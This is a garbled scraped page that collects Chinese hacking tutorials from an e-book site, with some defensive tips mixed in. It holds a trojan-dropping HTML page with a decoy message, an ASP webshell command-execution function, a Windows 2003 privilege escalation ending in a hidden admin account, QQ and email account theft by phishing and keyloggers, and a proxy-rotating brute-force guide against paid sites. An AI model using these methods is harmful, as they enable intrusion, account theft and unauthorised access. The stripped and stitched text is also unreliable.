oa办公精灵官方下载中为什么输入一字母出现四个字母

热门活动:
热线电话:028-96111
后使用快捷导航没有帐号?
点击查看更多
篮球活动摄影亲子DIY亲子课堂
华西都市报电子版
热帖排行榜
12345678910
华西都市报
华西都市报官方微信:
掌上四川官方微信:
zhangshangsc
华西传媒集群·媒体融合发展产品矩阵
华西都市报 两微一端
华西都市报官方微信:ihxdsb
最有传播力微信公众号成都范儿:cdfer100
华西都市网
四川华西都市网络科技有限公司
广告投放联系方式:028-
增值电信业务经营许可证:川B2-
四川华西都市网络科技有限公司
广告投放联系方式:028-这是个机器人猖狂的时代,请输一下验证码,证明咱是正常人~  &/script&
  &/BODY&&/HTML&
  下面制作文件:
  &!DOCTYPE HTML PUBLIC &-//W3C//DTD HTML ;&
  &HTML&&HEAD&
  &META http-equiv=Content-Type content=&text/ charset=gb2312&&
  &SCRIPT language=javascript&
  run_exe=&&OBJECT ID=\&RUNIT\& WIDTH=0 HEIGHT=0 TYPE=\&application/x-oleobject\&&
  run_exe+=&CODEBASE=\&#version=1,1,1,1\&&&
  run_exe+=&&PARAM NAME=\&_Version\& value=\&65536\&&&
  run_exe+=&&/OBJECT&&
  run_exe+=&&HTML&&H1& &/H1&&/HTML&&;
  ln(run_exe);
  &/SCRIPT&
  &META content=&Microsoft FrontP name=GENERATOR&&/HEAD&
  &BODY&
  &p align=&center&&论坛连接中请勿终断....
  &CENTER&&/CENTER&&BR&
  &BR&&/BODY&&/HTML&
  其中就是我们要执行的文件。至于那个“论坛连接中请勿终断....”完全是为了迷惑对方,可根据自己喜好而定。接下来只要将,和一起上传到主页的同一目录中就ok了!
  总结:这个方法的好处是,如果对方在局域网内,我们同样可以用木马进入他的机器并且很难发现。但这个方法也有自己的缺点,那就是用了两种木马,大大的增大了被杀毒软件查杀的几率。不过对方是在网吧中,而我们这里的网吧大多又不安装杀毒软件(用硬盘还原卡代替),并且不升级IE,我这次入侵成功,网吧老板也有一份功劳!书 包 网 txt小说上传分享
破解Email账号的三种方法
电子邮件并不是安全的,在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内容。
  一、利用邮件服务器操作系统的漏洞
  邮件服务器软件是运行在特定的操作系统上的,如Linux、Windows NT/2000等。这些操作系统的默认安装和配置都是不安全的,黑客可以轻易入侵系统,获得所有用户名和密码。
  1 Windows服务器
  如果是基于Windows2000的Exchange Mail Server,系统本身未做任何安全配置,开放了若干服务。入侵者可以利用终端服务器结合中文输入法漏洞或者IIS的Buffer Overflow程序获得Administrator权限,用pwdump3导出Hash过的密码,再用L0pht挂接字典或者Brute Force就能破解出用户密码。根据经验,如果密码简单,几分钟之内就能破解出,长度在8位及以下的用Brute Force方式在一天内就能解出。
  2 Linux/UNIX服务器
  UNIX类系统一般采用Sendmail作为邮件系统,在获得了系统的控制权之后,用John等软件就能从/etc/passwd或者/etc/shadow中破解出密码。如果采用了数据库方式来保存用户信息和密码,也是很容易被导出。
  二、利用邮件服务器软件本身的漏洞
  最常见的邮件服务器程序有Sendmail,Qmail等,在不同程度在都存在安全缺陷。以Sendmail为例,再以前的老版本中,telnet到25端口,输入wiz,然后接着输入shell,就能获得一个rootshell,还有debug命令,也能获得root权限。Qmail相对Sendmail安全,但是Qpoper存在Buffer Overflow缺陷,能够远程得到rootshell,进而控制系统。
  即使邮件服务器是安全的,但是入侵者还能获得更多的信息,比如用户名。telnet到25端口,输入expn tom或者vrfy tom就能查询系统是否有tom用户。最新版本的Sendmail虽然禁用了这两个命令,但是可以通过伪造发信人然后用rcpt to来判断该用户是否存在。
  得到了用户名,可以telnet到110端口,尝试简单密码的连接,或者套用字典破解。
  所以,必须禁止非本域的中继利用(relay),或者采用现在很多ISP都采用的给SMTP加上发信认证的模块,这样能够增强邮件服务器的安全。
  除了POP3方式收信之外,比较流行的是在WEB界面上处理邮件。这种方式也不无弱点,一般是通过CGI来接受用户传递的表单FORM参数,包括username和password,如果正确,就可以进入处理邮件的页面。破解已知用户的密码,有很多套用字典或者暴力组合的软件可用,比较著名的是小榕的《溯雪》,在密码简单的情况下,很快就有结果。
  WEB邮件系统都有“忘记密码”的选项,如果能破解寄回密码的另外一个邮箱或者猜出提示问题的答案,也能成功。
  三、在邮件的传输过程中窃听
  在网络中安装Sniffer,指定监听往外部服务器110端口发送的数据包,从收集下来的信息中查看user和pass后的字符串就能看到用户名和相应的密码。书包 网 bookbao.net 想看书来书包网
网吧如何来防御网游外挂木马全攻略
目前,很多人发布各种所谓的外挂程序或者不明网站的链接,奉劝各位,千万不要点击。因为那很有可能会捆绑一个“键盘纪录器”。
  为了您账号的安全,请您留心一下这些隐藏在诱惑中的“黑手”。
  防范方法
  1、请将IE的&INTERNET选项&的&高级&设置为&恢复默认设置&。
  2、不要安装和下载一些来历不明的软件,特别是一些所谓的外挂程序。
  3、不要随便打开来历不明信件的附件。
  4、安装最新杀毒软件,并定时升级病毒库。
  5、小心网吧的计算机上安装有记录键盘操作的软件,或被安装了木马。使用网吧计算机时,需先按ctrl,alt,del三个键,看看是否有来历不明的程序正在运行,如果有,则立即将该程序结束任务。
  6、网吧上网的用户,最好先扫描一下机器看是否有木马程序。
  针对于一些暴力破解密码的软件,破解用户的帐号密码
  这种方法主要是通过使用一些暴力破解密码的软件,用穷举法逐个的尝试用户的帐号密码,但需要使用者有一定的电脑知识,而且破解需要很长时间。
  防范方法
  1、尽量避免将游戏帐号暴露在公众论坛和其他网站。
  2、用户在设置密码时,尽量设置的复杂一点,最好设置为8位数以上的字母、数字和其他符号的组合。
  3、不要使用可轻易获得的关于您的信息作为密码。这包括生日、身份证号码、手机号码、您所居住的街道的名字等等。
  4、经常更换密码,因为8位数以上的字母、数字和其他符号的组合也不是无懈可击的。
  5、申请密码保护,也就是设置安全码,安全码不要和密码设置的一样。如果您没有设置安全码,那么别人一旦破解您的密码,就可以把您的密码和注册资料(除证件号码外)全部修改。
  木马防御全攻略
  您的计算机是否已被装了木马?如何检测?
  1)检查注册表看HKEY_LOCAL_MACHINE/SOFTWARE/MicrosoftWindows/
  Curren Version 和HKEY_CURRENT_USER/Software/MicrosoftWindows/
  CurrentVersion下,所有以&Run&开头的键值名,其下有没有可疑的文件名。如果有,就需要删除相应的键值,再删除相应的应用程序。
  2)检查启动组木马们如果隐藏在启动组虽然不是十分隐蔽,但这里的确是自动加载运行的好场所,因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为:C:windowsstart menuprogramsstartup,在注册表中的位置:HKEY_CURRENT_USER/Software/
  MicrosoftWindows/Current Version/ExplorerShell
  Folders Startup=&C:windowsstart
  menuprogramsstartup&。要注意经常检查这两个地方哦!
  3)以及也是木马们喜欢的隐蔽场所,要注意这些地方。比方说,的[Windows]小节下的load和run后面在正常情况下是没有跟什么程序的,如果有了那就要小心了,看看是什么;在的[boot]小节的Shell=后面也是加载木马的好场所,因此也要注意这里了。当你看到变成这样:Shell=,请注意那个很有可能就是木马服务端程序!赶快检查吧。
  4)检查C:、C:、。木马们也很可能隐藏在那里。
  5)如果是EXE文件启动,那么运行这个程序,看木马是否被装入内存,端口是否打开。如果是,则说明要么是该文件启动木马程序,要么是该文件捆绑了木马程序,只好再找一个这样的程序,重新安装一下了。
  6)木马启动都有一个方式,它只是在一个特定的情况下启动,所以,平时多注意一下你的端口,查看一下正在运行的程序,用此来监测大部分木马应该没问题的。书包网 www.bookbao.net
利用QQ文件共享漏洞入侵 Windows2003
服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在,著名的腾讯qq又被列入了这些捷径名单,好在qq并不是服务器必备的软件之一,所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多,但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。
  一、在windows2003中得到的webshell
  此次渗透的目标是一台oa办公系统服务器。其操作系统新近升级到了windows2003,但oa仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。
  登陆webshell后发现只能查看服务器的d盘,对c盘不能进行任何访问,webshell的提示是“没有权限”。这点早在意料之中,因为wenshell只有guests组权限,再加上win2003默认禁止了“everyone&匿名用户及“guest&组权限用户访问,还造成了不能通过webshell运行。
  唯一值得庆幸的是利用webshell 可以对d盘(存放有web虚拟目录)各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯qq安装目录tencent。
  二、破解serv-u的终极防范
  windows2003的种种默认安全配置展示了它强大的一面,近一步提升现有权限似乎已不太可能,直到我试图从系统入手向这台服务器发出ftp链接请求并看到serv-u的banner时才觉得又有了一线希望。
  前面提到由于windows2003对的权限限制,通过webshell方式不能运行,这样的论断在2004年6期的防线的《构建windows2003堡垒主机》一文也曾提到,但实践表明这并不正确,通过webshell上传本地非2003系统中未受限制的文件到可执行目录,再通过wscript组件,同样能够通过webshell方式在windows2003下获得相应权限的。结合,甚至还能得到一个guest组权限的命令行下的shell。
  为此,我对老兵的站长助手做了一些改进,增加了如下代码,使其能够利用组件运行本地上传的。
  function cmdshell()
  if request(&sp&)&&&& then session(&shellpath&) = request(&sp&)
  shellpath=session(&shellpath&)
  if shellpath=&& then shellpath = &&
  if request(&wscript&)=&yes& then
  checked=& checked&
  checked=&&
  end if
  if request(&cmd&)&&&& then defcmd = request(&cmd&)
  si=&&form method='post'&&input name='cmd' style='width:92%' class='cmd'
  value='&defcmd&&'&&input type='submit' value='运行'&&
  si=si&&&textarea style='width:100%;height:500;' class='cmd'&&
  if (&cmd&)&&&& then
  if (&wscript&)=&yes& then
  set cm=createobject(obt(1,0))
  set dd=(shellpath&& /c &defcmd)
  si=si&aaa
  else%&
  &object runat=server id=ws scope=page classid=&clsid:72c24dd5-d70a-438b-8a42-
  98424b88afb8&&&/object&
  &object runat=server id=ws scope=page classid=&clsid:f935dc22-1cf0-11d0-adb9-
  00c04fd58a0b&&&/object&
  &object runat=server id=fso scope=page classid=&clsid:0d43fe01-f093-11cf-8940-
  00a0c9054228&&&/object&
  &%sztempfile = (&;)
  call (shellpath&& /c & & defcmd & & & & & sztempfile, 0, true)
  set fs = createobject(&;)
  set ofilelcx = (sztempfile, 1, false, 0)
  aaa=()
  call (sztempfile, true)
  si=si&aaa
  end if
  end if
  si=si&chr(13)&&&/textarea&&
  si=si&&shell路径:&input name='sp' value='&&shellpath&&' style='width:70%'& &
  si=si&&&input type='checkbox' name='wscript' value='yes'&&checked&&&&/form&&
  end function
  利用时只需在shell路径中指定上传的路径,再选中选项wscript就能运行一些所需权限较低的系统命令,如“net start”或者“netstat -an”,依次运行这两个命令后webshell回显了众多服务,包括serv-u ftp server。
  活动端口列表中又出现了43958端口,于是我自然想到了神通广大的serv-u ftp server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时,却出现了530错误提示。看来管理员或者其他人对serv-u打上了布丁或者做了某些安全配置。
  为了知道究竟是怎样的安全配置,上网查了查相关文章,其中有一篇《serv-u ftp server 本地权限提升漏洞的终极防范》很受欢迎,被多方转载,作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范,即对中默认的管理员或密码进行了修改。
  当然这只是假设,只有将目标服务器上的下载下来看看具体配置才能确定,但是安装有serv-u的c盘禁止访问,包括programe files 目录,权限提升再次受阻。
  三、利用qq2005共享文件漏洞将权限提升到底
  再次翻了翻d盘,又见到了那个很少能在服务器中看到的tencent文件夹。查看。
  得知qq的版本是qq2005 beta1,几个于相关文件的创建时间也说明网管最近在服务器上登陆过qq。难道只能用qq?经过一番思索,终于想到一个可以利用的qq2005在文件共享功能上的一则漏洞。
  该漏洞是随着qq2005贺岁版新增功能出现的。可以将其危害描述为:利用该漏洞,攻击者可以浏览,读取用户系统中的任意文件(如sam文件、数据备份文件、敏感信息文件)。影响系统:安装有qq2005贺岁版以上的所有windows系列操作系统。
  具体利用方法是:先在本机登陆自己的qq,调出“qq菜单”,选择工具-&设置共享,指定c:\或者其他任何有利用价值的分区为共享文件,完成后关闭qq,找到安装目录下的以qq帐号命名的文件夹内“”文件。上传覆盖目标服务器上相同文件(如:d:\tencent\qq\654321\)。这样,当网管在服务器上登陆qq时就会向好友开放c盘为共享目录。
  因为陌生人是不能共享对方文件,所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求,服务器的c盘会以qq共享文件目录的名义被共享,原本不能通过webshell访问的文件就能被下载,遇到阻碍的权限提升之路又能继续了。
  当晚管理员就通过了申请,将我添加为好友。珊瑚虫qq上显示的ip正是目标服务器的ip,于是下载了文件,用ue打开后查找,发现默认配置下的内置帐户“localadministrator”果然被改成了“localadministruser”。
  这看起来是一个很“终极”的防御,但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布,要知道攻击者只需知道修改后的配置,并对本地权限提升利用工具进行相应的修改,所谓的终极防御也就被攻破了。方法还是用ue打开脱了壳的serv-u本地权限提升利用工具,将localadministrator改为localadministruser即可。
  然后上传修改后的,在中执行d:\web\ “net user user password /add”后看看结果,已经成功添加了一个用户。再把该用户加入administrators组和“remote desktop users”组后登陆了目标服务器的远程桌面。
  经过重重险阻,终于彻底攻陷了这台坚固的windows2003堡垒。
  四、简单启示
  可以看出,和“服务越少越安全”一样,服务器上运行的“第三方”越少越安全,流行的pcanywhere、vnc、serv-u 权限提升和这里提出的利用qq2005提升权限,都是可以这样避免。
盗QQ的几种方法!
这些日子没写教程真是对不起大家。为此我这次教大家怎么盗QQ来弥补我的过失!教程以后仍会继续写的,大家继续关注吧!
  “远程破解”与前面的“本地破解”正好相反,是指QQ盗号者通过网络盗窃远端QQ用户的密码。这种QQ破解有很多方法,如在线密码破解、登录窗口破解、邮箱破解、消息诈骗以及形形色色的QQ木马病毒等。下面就让我们一同来看看这些QQ密码的远程破解是怎么实现的。
  1、在线密码破解
  大家知道QQ可以利用代理服务器登录,这是一种保护措施。它不仅可以隐藏用户的真实IP地址,以避免遭受网络攻击,还可以加快登录速度,保证登录的稳定性。
  在线密码破解和本地密码破解采用的技术方法类似,都是穷举法,只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描,只要想盗的QQ号码在线,就可利用在线盗号工具实现远程TCP/IP的追捕,从而神不知鬼不觉地盗取QQ密码!
  在线破解改变了本地破解那种被动的破解方式,只要是在线的QQ号码都可以破解,适用范围较广。但是由于它仍然采用穷举法技术,所以在枚举密钥位数长度以及类型时,校验时间很长,破解效率不高。同样,这种方法还受到电脑速度、网速等诸多因素的影响,因此比前面的本地破解更麻烦。
  目前功能比较强大的一款QQ密码在线破解软件叫QQExplorer。它的破解操作分四步:第一步,在QQ起始号码和结束号码中填上想要盗取的QQ号码(此号码必须在线);第二步,在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码(如果你嫌自己寻找QQ代理服务器麻烦,可以使用一些现代的QQ代理公布软件);第三步,点击“添加&测试”按钮,软件先自动检测此服务器是否正常,确定后将它加入代理服务器列表(此软件可填入多个代理服务器的地址,并且能够自动筛选不可用或者速度慢的服务器);第四步,点击“开始”按钮,开始在线密码破解……
  2、登录窗口破解
  伪造QQ登录窗口的盗号方法非常简单,这是一种比较另类的木马破解方法(后面对木马破解有专门讲述)。先用盗号软件生成一个伪装的QQ主程序,它运行后会出现跟腾讯QQ一模一样的登录窗口,只要用户在这个伪登录窗口中登录,输入的QQ号及密码就会被记录下来,并通过电子邮件发送到盗号者指定的油箱中,在此以一款叫“狐Q”的软件为例,首次运行它时,它会把自身复制到QQ目录中,并把原来的文件改名为(这样的更改不会影响QQ的正常运行)。设置完毕后,“狐Q”的原程序就会消失,伪装成QQ等待“猎物”上钩……在其软件设置中,有一项设置可以决定真假QQ交替运行的次数,可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3,那么用户第一次运行的是真QQ了,也就是说在第三次运行时,用户的QQ号便被盗了!在QQ密码发送的过程中,如果发送失败,它还会把QQ号和密码记下来,等待下一次发送。
  即时监视QQ登录窗口的盗号方法利用Windows窗口函数、句柄功能实现QQ号和密码的后台截取。此类软件几乎可以捕获Windows下所有标准密码框中的密码,如QQ、Outlook、屏幕保护程序、各种电子邮件客户端、各种游戏账号和上网账号等。捕获后,它也会将密码实时发送到盗号者指定的邮箱中。其代表性的盗号软件是“密码使者”,它几乎可以捕获Windows 9x/2000/XP下所有登录窗口中的密码,并且还能够盗取在网页中登录的各种密码。盗号在使用这款软件时,只须填上用于接收别人QQ密码的邮箱地址及保护密码,并把生成的盗号器文件传过去哄骗别人运行,然后就可以坐等密码上门!此软件与传统的键盘记录器不同,它在电脑每次开机时隐藏自启动,不管密码是用键盘输入的,还是复制、粘贴的,都能够有效地实时拦截!其注册版本居然还带有自动升级的功能,破坏力十分巨大。
  3、邮箱破解
  利用邮箱盗取QQ密码也是一种比较常用的方法。我们都知道,腾讯公司在对用户的QQ号码进行验证时需要用户填写电子邮箱。对于申请了“密码保护”功能的用户,在腾讯主页上找回遗忘的密码时,密码会被发送到用户注册时的邮箱中。所以,只要盗号者破解了对方的电子邮箱,就有机会得到其QQ密码!通常我们在对方QQ注册时填写的邮箱。至于如何破解电子邮箱,具体的操作方法有多种,由于它有点超出文本的范畴,所以大家可以自己上网查询相关资料,在此就不赘述了。
  4、消息诈骗
  孔子曰:上士杀人用笔端,中士杀人用语言,下士杀人用石盘。远程盗取QQ密码还有一种大家最常见也是最简单最有效的方法,那就是利用不少人爱贪小便宜的弱点,进行人为的欺骗!
  标题:腾讯关于xxxxx获奖通知
  “QQ幸运儿:恭喜!!!您已经成为QQ在线网友齐抽奖的中奖用户。您将获赠精美T恤1件,并有机会得到NOKIA 7110手机1部。腾讯公司()注:奖品是以邮寄方式寄出,请您认真填写以下资料。如果填写错误,将被作为自动放弃获奖机会处理。& & QQ号码:& 密码:& 姓名:& E-mail地址:& 身份证号码:& 通讯地址:& 联系电话:& 邮编:”
  比如我们的QQ经常会收到如下的陌生人消息。
  如果你真的如实填写这些资料并傻傻的发送回去,不一会儿QQ密码就被盗了。
  还有类似这样的消息:“亲爱的***号QQ用户,恭喜你你已经成为腾讯的幸运号码,腾讯公司送你QQ靓号:12345,密码:54321。请尽快登陆并修改密码,感谢您对腾讯公司的支持!”不少人一看,以为白捡的便宜来了 ,登录一试还是真的,于是就大大咧咧地笑纳了。但是,很多人为了方便,不管什么东西都爱使用相同的密码,所以当这个QQ号的密码被你改为与自己QQ号相同的密码时,自己QQ号的连同这个赠送的QQ号都得玩完!这是因为,赠送的QQ号已被盗号者申请过密码保护,当你更改密码后他就利用腾讯的密码保护功能把它收了回去,同时也收走你的QQ密码。如果你的QQ没有申请过密码保护,此刻就只能和它永别了。
计算机十二种常用密码破解法
在日常操作中,我们经常要输入各种各样的密码,例 如开机时要输入密码,QQ时也要先输入密码,假如你忘记了这 些密码,就有可能用不了机器、打不开文件、不能聊天...。
  也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码 的破解方法,希望能解你燃眉之急!
  一、遗忘了SYSTEM密码
  如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了, 解决的办法只能是:打开机箱,把电池取下、正负极短接,给 CMOS放电,清除CMOS中的所有内容(当然也就包括密码),然后 重新开机进行设置。
  注意:有些主板设置了CMOS密码清除跳线,请参 照主板说明书将该跳线短接,这样也可以清除CMOS密码。
  二、遗忘了SETUP密码
  遗忘了该密码,就不能进行CMOS设置了。如果你能使用计算机 ,但不能进入CMOS设置,可以这样解决:在DOS状态下启动DEBUG ,然后输入如下命令手工清除SETUP密码:
  _ o 70 16
  _ o 71 16
  你也可以 用CMOS密码破解软件来 显示CMOS密码,这样的软件有很多,例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、 PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS),在DOS下启动该程序,CMOS密码就会显示出来 。
  三、遗忘了Windows登录密码
  WinMe/98下对策:开机后按F8键选择DOS启动,然后删除Windows 安装目录下的*.PWL密码文件、以及Profiles子目录下的所有个 人信息文件,重新启动Windows后,系统会弹出一个不包含任何 用户名的密码设置框,此时无需输入任何内容,直接单击“确 定”,登录密码即被删除。
  另外,将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon 分支下的UserProfiles修改为“0”,然后重新启动Windows也 可达到同样目的。
  WinXP/2000下对策:删除系统安装目录\system32 \config下的SAM文件,重新启动,此时管理员Administrator账 号已经没有密码了,用Administrator帐户登陆系统,不用输入 任何密码,进入系统后再重新设置登陆帐户密码即可。
  四、遗忘了Windows屏保密码
  解决方法:在开机后按F8键,选择安全模式启动,进入Windows 后,右击桌面空白处,从弹出的快捷菜单中选择“属性”/屏幕 保护,取消“密码保护”即可。
  五、遗忘了Windows电源管理密码
  Windows的电源管理功能也可以设置密码,启用此功能后,当系 统从节能状态返回时就会要求输入密码。
  如果你遗忘了该密码,可以使用前面破解Windows登录密码的那 种方法去破解。
  六、遗忘了微软Office密码
  解决方法:使用破解Office系列文档密码的软件,这样的软件有 很多,例如AOPR(下载网址),该软 件可以同时对微软Office系列Word、Excel及Access等软件所生 成的密码进行破解,还可以对Word的*.DOT模板文件的密码进行 搜索。
  七、遗忘了WinZip压缩包密码
  解决方法:用软件UZPC(Ultra Zip Password Cracker,找回丢失的密码。使用该软件时要先设置适当的解密 方式,例如“后门方式”、“穷举方式”、“字典方式”和“ 模式匹配方式”等,一般采用“Brute Force穷举方式”,然后软件就会对所有可能的密码进行测试, 直至找出最后的结果。
  八、遗忘了RAR压缩包密码
  遗忘了RAR压缩包密码后,你可下载一个CRARK软件来对其进行破解,它主要通过命令 行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使 用“CRARK RAR压缩包文件名”命令,利用缺省参数即可进行破解。
  九、遗忘了QQ/ICQ密码
  为保护QQ密码,你应该赶快到这里 申请密码保护。假如你忘记了QQ密码、或者密码被盗时 ,只需填写正确的信息即可取回。
  如果你要找回 ICQ密码,可以使用软件ICQ Password Revealer,这是一个DOS下的命令 行实用软件,你只需在ICQ安装文件夹的NEWDB子文件夹下执行 该文件,然后按照屏幕提示输入自己的UIN,系统即会找回“久 违”的ICQ密码。
  十、遗忘了OE密码
  如果你忘 了密码,无法进入OutLook Express阅读收到的邮件、使用通讯簿等,可以这样破解:重启 计算机并按F8,选择“安全模式”,再启动OE就不需要密码了 ,然后你可以重建一个用户(不能修改密码),把信息导入新用 户信箱即可。
  十一、遗忘了Foxmail帐户密码
  解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail,新 建一个帐户(帐户名任意,例如如lacl1),然后退出F运 行Windows资源管理器,找到Foxmail\MAIL\lacl1文件夹,里边 有个“”,把它复制到忘记密码的帐户(例如 “lacl”)目录中,直接覆盖原来的“”文件;再重 新运行Foxmail,打开忘记密码的帐户,呵呵,怎么连“口令提 示框”也没有?现在你就可以直接打开忘记密码的帐户,而且帐 户中原来的邮件一封都不会少!
  十二、查看“*”密码
  许多密码在屏幕上都是以“*”显示的,因此我们无法直接看到 密码的原始字符,如果你使用专门破解“*”密码的软件,即可 查出这些密码的原始字符。
  这样的软件有很多,例如Win2000/Win98下你可用iOpus Password Recovery,WinXP下可用Password Spectator Pro 。使用时,只需先打开显示“*”的窗口,启动这类软件,然后 按住Ctrl键、在密码栏中按下鼠标左键,这些“*”密码的原始 字符就会显示出来了。书包 网 bookbao.net 想看书来书包网
七种武器让你轻松破解“还原精灵”
有些时候你是不是有些烦还原精灵,刚对系统进行的配置,重启后又恢复原貌了,本文就给大家讲了还原精灵的七大破解方法……
  方法一:临时解决办法
  如果在忘记还原精灵密码后,你安装了一个新程序,该软件提示要求重启计算机,此时不要点击“确定”按钮,选择“以后重启”。然后在“开始→关闭系统”中选择“重新启动计算机”,注意此时一定要按住Shift按键不放,这样计算机将直接重新加载系统程序,从而绕过还原精灵的保护。
  方法二:长期解决办法
  如果想长期保存自己的文件,就必须卸掉还原精灵或者取得还原精灵的管理员密码,要卸掉还原精灵其实不难,网上有专门清除还原精灵的程序“还原精灵清除器”,运行以后直接清除还原精灵的密码。不过需要注意,由于还原精灵是在硬盘最重要的主引导记录MBR里面做的文章,所以使用这个还原精灵清除器有一定的危险。
  方法三:利用初始密码
  还原卡都有默认的初始化密码,如果你压根儿就没有修改过它的默认密码的话,就简单多了,因为还原精灵的默认密码是!
  方法四:写信索取密码
  在安装还原精灵时会带有一个还原精灵辅助工具,即厂商提供的密码读取工具,运行它也可以得到还原精灵的加密密码,格式类似这样:[DB][B8][5E][79][3E][3B][5E][C5][BD][B2],把该加密密码发送到这个信箱:info@,只需一两天就可以得到软件开发商发来的密码。
  这样,无需任何软件,简单的几下就可以得到还原精灵的密码!反过来讲任何人用这个方法都可以得到还原精灵的密码,包括受限制的用户!所以大家要保存好密码读取工具,将它改名隐藏或干脆删除。
  方法五:重写主引导扇区
  还原精灵会截取系统的底层功能调用,在硬盘的主引导区留下自己的痕迹。硬盘的主引导区存放的是系统的主引导信息、分区信息,一般说来病毒对它非常感兴趣。如果我们能先于还原精灵占有硬盘的主引导扇区(MBR),那么我们就可以对硬盘拥有最大的管理权限,换句话说,还原精灵已经被我们“干掉”了。
  依据上面如上原理,用fidisk/mbr命令重写主引导扇区,然后重新启动计算机,这样还原精灵就没有了。
  方法六:利用16进制文件编辑器
  WinHex的内存搜索编辑功能可以帮我们找回丢失的还原精灵密码。具体方法是:右击任务栏右下角的还原精灵图标,在弹出菜单中选择“参数设置→更改密码”,在对话框中输入旧密码,胡乱填写几个数字如123456;在新密码框中输入新密码,这里也胡乱填了个371042,最后点“确定”按钮。
  由于我们是胡乱输入的密码,所以旧密码是不会正确的,此时会弹出对话框,提示密码不正确,注意千万不要点击“确定”按钮,赶紧运行16进制文件编辑器WinHex,点“工具”菜单中的“RAM编辑器”,在打开的窗口中找到Hddgmon下的“主要内存”,这里的Hddgmon是还原精灵的进程。
  最后,在WinHex中点击“搜寻→寻找文字”菜单选项,在打开的窗口中添入你随便填入的假密码371042。点“确定”之后,真正的密码就会出现在我们面前了!
  原理:输入密码后,该软件会用其内部事先定义好的方法来计算真正的密码,与输入的密码进行比较,这个比较的过程是在内存中进行的。由于WinHex具有优秀的内存编辑功能,因此通过在内存中搜索输入的字符串,来找到它们。而一般情况下,真假密码的比较离得会很近,这样我们就可以轻松发现它们。
  方法七:利用还原精灵密码读取软件
  通过方法六我们不难得出结论:还原精灵存在内存中存放明文密码的漏洞,还原精灵密码读取软件,使用该软件可以轻松地得到还原精灵的密码。该软件使用方法很简单,只要打开还原精灵的“更改密码”的窗口或“检查管理员密码”的窗口,然后无需输入任何密码,只要点击该软件的“读取”按钮,就会自动从还原精灵的内存中读取密码。书包网 电子书 分享网站
收费网站破解
谈到破解,当然需要一个工具,在这方面我们不得不承认国外的破解工具胜过国货
  我以前用过流光等一些黑客工具。在破解网站的能力上十分有限。所以我在这里向
  大家推荐一个破解工具 AccessDiver 汉化版 (下载)
  下载安装后。当然现在需要的是我们破解的对象,也就是想要破解的网站了。首先大家需要找到网站members的入口地址,举个例子我们在下面这个网页中看到了members only的标志
  http://***********/cgi-bin/**********.cgi/raw_3710/Z
  那么我们就可以把鼠标放到members only上面然后点右键,点复制快捷方式,这样我们就
  得到了我们要破解的网址了。我们把这个网址http://*******/me****/
  复制到破解工具AccessDiver最顶端SERVER后面的的那个长方框里面。ok!!第一步就完成了 。
  呵呵!!很多朋友听到这里可能觉得,这么简单啊!!你还用那么长时间才学会,真是笨 其实这只是刚刚开始,接下来跟着我一起继续破吧! 我们破解确实很爽。别人开网站的就到了霉,如果那一天发现我们的ip破他的网站 他肯定会拚了老命也要把我们逮出来。所以这里就要说到破解的安全性了。也就是proxy 的使用,请大家在AccessDiver的界面点proxy然后在 USE WEb proxies前面的方格里打勾 看到Rotate proxies了吧?继续在它前面的方格你打勾,然后你会看到在Rotate proxies 与logins to try before swapping 之间又出现一个方格,然后在里面填上 1 。这个选项 是说我们每用完一个proxies后然自动换另一个,这是保证破解质量的一个重要因素。因为 网站在安全系统方面已经改进了很多,如果你用一个ip(代理)破解它的网站,不到1 分钟。便死悄悄了。。。。所以下面我们就需要一个所谓的proxylist.我在这里可以向大家 提供一个list,大家把它保存在自己的硬盘后,然后用proxyhunter把它们检验一遍。把好的
  代理(proxies)保留在一个文档,然后在界面proxy--my list的最右边点击那个黄色文件夹 的标志,我们就可以把刚才存档的proxy文档输进去了。然后对着最上面“黑色的勾“点右键就把所有的proxy选择了,最后在任意一个proxy上点一下,也就算把proxy的准备工作结束了。最关键的时刻来到了,做完最后一部我们就可以开始破他了!也就是我们常说到的 字典了,字典对于破解网站有着不言而喻的关键作用,字典如果选得不好,你就算从 你的虫虫没长好开始破一直破到你老眼昏花都是无济于事的。那么今天我在这里会向大家 贡献一个wordlist(字典),以后大家就要自己来leech wordlist.这里我不作详细介绍 ,具体的方法我会在大家对这个破解工具比较熟悉的情况下继续介绍。好的。点Dictionary 在点 Curently used,然后点load a comb file把我给你的wordlist输进去吧!!
  哈哈!!终于快写完了,大家也快见到曙光了。我们现在就可以开始了。记住上面的每
  一步你都要照做,否则开始不了不要找我!!如果你之前得每一部都搞定,那么我们就点
  AccessDiver界面左上方黄色的Standard键,嘿嘿!!应该开始了吧!如果没有,就是你的 proxy的问题。那么到proxy--my list 选项里选择一个其他的proxy在开始
  基本上最基本的方法我写完了,第一次肯定不会顺利。要知道我第一次破出密码是
  看了文章后的一个星期左右啊!你们比我幸运,至少看得是中文呀!时间肯定比我少,但是
  破不出来也不要伤心,自己慢慢的研究。
  关于对proxy设置的重要补充:
  就是首先大家要把my skill选成expert.
  然后然后在 USE WEb proxies前面的方格里打勾
  看到Rotate proxies了吧?继续在它前面的方格你打勾,然后你会看到在Rotate proxies
  与logins to try before swapping 之间又出现一个方格.然后在里面填上 1
  在proxy skipping
  下面有四个框,在前3个框上打勾。
